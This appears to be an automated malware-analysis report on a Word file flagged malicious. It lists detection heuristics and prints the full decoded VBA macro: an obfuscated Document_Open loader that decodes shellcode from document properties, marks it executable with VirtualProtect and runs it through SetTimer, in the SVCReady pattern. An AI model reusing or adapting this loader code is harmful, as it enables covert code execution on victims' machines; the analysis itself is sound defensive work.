MALICIOUS
310
Risk Score
Heuristics 9
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: word/MCKwOqqCvm.bin)
-
VBA property-stored shellcode loader critical OLE_VBA_PROPERTY_SHELLCODE_LOADERVBA auto-exec macro takes the address (VarPtr) of a byte buffer decoded from a document property, marks memory executable (VirtualProtect/VirtualAlloc), and transfers control through a callback API (e.g. SetTimer/EnumWindows). The payload is hidden in the document properties rather than the macro source — the SVCReady loader pattern, a native shellcode runner rather than a parser CVE.Matched line in script
Private Declare PtrSafe Function ScribbetSonnets Lib "user32" Alias "SetTimer" (ByVal RecombedGainsayingChumpishness As LongPtr, ByVal RegellingRecommittalBrummy As LongPtr, ByVal SpuriesNerols As LongPtr, ByVal CluppeCancerphobiaUnbanded As LongPtr) As LongPtr -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
GetObject(uwlH4o6YYz("fh3AAa")).Environment(uwlH4o6YYz("DyfplMjlWo"))(uwlH4o6YYz("ea4IRKRw5s")) = ActiveDocument.FullName -
VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMEDThe VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
GetObject(uwlH4o6YYz("fh3AAa")).Environment(uwlH4o6YYz("DyfplMjlWo"))(uwlH4o6YYz("ea4IRKRw5s")) = ActiveDocument.FullName -
VBA reads reversed config from document properties high OLE_VBA_REVERSED_DOCPROP_CONFIGVBA applies StrReverse to values read from the document's custom/built-in properties. Storing reversed configuration (URLs, CLSIDs, env-var names, payload names) in document properties keeps indicators out of the macro source — an obfuscation technique used by the SVCReady loader.Matched line in script
uwlH4o6YYz = StrReverse(ActiveDocument.CustomDocumentProperties(strInput)) -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
OOXML part with non-standard content type and high-entropy data high OOXML_BOGUS_CUSTOM_PARTThe package declares a part with an invented content type (not an OpenXML/Office/standard media type) holding large, high-entropy (likely encrypted/packed) data. Legitimate OOXML files do not carry opaque binary blobs under custom content types; this is the embedded next-stage payload pattern used by loaders such as SVCReady.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5100 bytes |
SHA-256: 5cfd189a4c59a03e49ae68f4313a260f47c6e425717cedfea3ac1aa206de182c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function ScribbetSonnets Lib "user32" Alias "SetTimer" (ByVal RecombedGainsayingChumpishness As LongPtr, ByVal RegellingRecommittalBrummy As LongPtr, ByVal SpuriesNerols As LongPtr, ByVal CluppeCancerphobiaUnbanded As LongPtr) As LongPtr
Private Declare PtrSafe Function DawkinWoons Lib "kernel32" Alias "VirtualProtect" (ByVal ShivsTentigo As LongPtr, ByVal HaemostasisDeadlinessSchedulers As LongPtr, ByVal AcylaminoMisstatedTopsail As LongPtr, AnabasineAtracheate As LongPtr) As LongPtr
Private Declare PtrSafe Function ExhumationsDisencharm Lib "user32" Alias "KillTimer" (ByVal PreillustrateSusceptiblyVegetive As LongPtr, ByVal DesalinizingFungosity As LongPtr) As LongPtr
#Else
Private Declare Function ScribbetSonnets Lib "user32" Alias "SetTimer" ( ByVal ElectrolyzableAluminite As Long, ByVal HyphenizeNontreasonablyNoncadenced As Long, ByVal NoninfectingHagrideFrigidaria As Long, ByVal BrachycephalizationSplitters As Any) As Long
Private Declare Function DawkinWoons Lib "kernel32" Alias "VirtualProtect" (ByVal UntraitorousHollantideSolfeges As Long, ByVal FeminizePeregrinusCultigen As Long, ByVal UnrelentableUndiscouraginglyLovelier As Long, CrowsteppedLophiomyinaeHugest As Long) As Long
Private Declare Function ExhumationsDisencharm Lib "user32" Alias "KillTimer" ( ByVal EpicycleEducatedlyLugubriosity As Long, ByVal CephalometerAttagal As Long) As Long
#End If
Private Sub Document_Open()
Dim SupernegligentlyLexicographers() As Byte
#If Win64 Then
SupernegligentlyLexicographers = PupilloscopyRadicallyLenad(ActiveDocument.BuiltInDocumentProperties(uwlH4o6YYz("EGHbu9IrT")).Value)
#Else
SupernegligentlyLexicographers = PupilloscopyRadicallyLenad(ActiveDocument.BuiltInDocumentProperties(uwlH4o6YYz("vyTyCvUsj")).Value)
#End If
#If VBA7 Then
Dim OutfablesMicrospheruliticReckons As LongPtr
Dim WhitrackDatelinesOozoa As LongPtr
Dim NonexigentlyIntestinesOstearthritis As LongPtr
Dim FaipuleMelicerous As LongPtr
#Else
Dim OutfablesMicrospheruliticReckons As Long
Dim WhitrackDatelinesOozoa As Long
Dim NonexigentlyIntestinesOstearthritis As Long
Dim FaipuleMelicerous As Long
#End If
WhitrackDatelinesOozoa = UBound(SupernegligentlyLexicographers) + 1
NonexigentlyIntestinesOstearthritis = VarPtr(SupernegligentlyLexicographers(0))
DawkinWoons NonexigentlyIntestinesOstearthritis, WhitrackDatelinesOozoa, 64, VarPtr(OutfablesMicrospheruliticReckons)
GetObject(uwlH4o6YYz("fh3AAa")).Environment(uwlH4o6YYz("DyfplMjlWo"))(uwlH4o6YYz("ea4IRKRw5s")) = ActiveDocument.FullName
GetObject(uwlH4o6YYz("Sod0ECDat")).Environment(uwlH4o6YYz("HLyi8m6RDv57"))(uwlH4o6YYz("Pc1C6dscU")) = uwlH4o6YYz("qMBmari")
FaipuleMelicerous = ScribbetSonnets(0, NonexigentlyIntestinesOstearthritis, 1, NonexigentlyIntestinesOstearthritis)
NostrilsomeUnpracticed 1
ExhumationsDisencharm 0, FaipuleMelicerous
GetObject(uwlH4o6YYz("dbGi4qyqFq")).Environment(uwlH4o6YYz("ARCuddBQd")).Remove (uwlH4o6YYz("bytJaS5YG"))
GetObject(uwlH4o6YYz("WiYZGCHGG")).Environment(uwlH4o6YYz("syonZUoFo")).Remove (uwlH4o6YYz("GgXZ5rIN"))
ReDim SupernegligentlyLexicographers(1)
End Sub
Sub NostrilsomeUnpracticed(Finish)
Dim SilhouettingAdactylia As Long
Dim SasanquaGatheredIsomaltose As Long
SasanquaGatheredIsomaltose = Timer() + (Finish)
Do
SilhouettingAdactylia = Timer()
DoEvents
Loop Until SilhouettingAdactylia > SasanquaGatheredIsomaltose
End Sub
Function FibrochondromaChristhoodPrecancerous(KeratocricoidBeltmakingDonatio, DioctophymeAntinepoticApiology)
FibrochondromaChristhoodPrecancerous = Mid(KeratocricoidBeltmakingDonatio, DioctophymeAntinepoticApiology + 1, 1)
End Function
Function AnticynicallyGrozer(MoneyPhysicists) As Long
If Int(Rnd(23)) > 2 Then
AnticynicallyGrozer = 9000
Else
AnticynicallyGrozer = Len(MoneyPhysicists)
End If
End Function
Function PupilloscopyRadicallyLenad(SubstoreroomAuxinicThysanurian)
ReDim ConcursAssemblingHypercyanotic(AnticynicallyGrozer(SubstoreroomAuxinicThysanurian) - 1) As Byte
Dim NonaffiliatingSinters As Long, DoweledTchastPleuronect As Long
Dim ChestilyBechatter: ChestilyBechatter = uwlH4o6YYz("inLFScG1x2Yyu") & uwlH4o6YYz("vqMxZXnjdcUW")
For NonaffiliatingSinters = 0 To AnticynicallyGrozer(SubstoreroomAuxinicThysanurian) - 1 Step 2
DoweledTchastPleuronect = NonaffiliatingSinters / 2
ConcursAssemblingHypercyanotic(DoweledTchastPleuronect) = CDec(ChestilyBechatter & FibrochondromaChristhoodPrecancerous(SubstoreroomAuxinicThysanurian, NonaffiliatingSinters) & FibrochondromaChristhoodPrecancerous(SubstoreroomAuxinicThysanurian, NonaffiliatingSinters + 1))
Next
PupilloscopyRadicallyLenad = ConcursAssemblingHypercyanotic
End Function
Public Function uwlH4o6YYz(strInput)
uwlH4o6YYz = StrReverse(ActiveDocument.CustomDocumentProperties(strInput))
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/MCKwOqqCvm.bin | 8704 bytes |
SHA-256: a46953e9c7cd0f755c0e7b6e3d465340450aac3e1cb1ce2ee0c0c0dfda216026 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.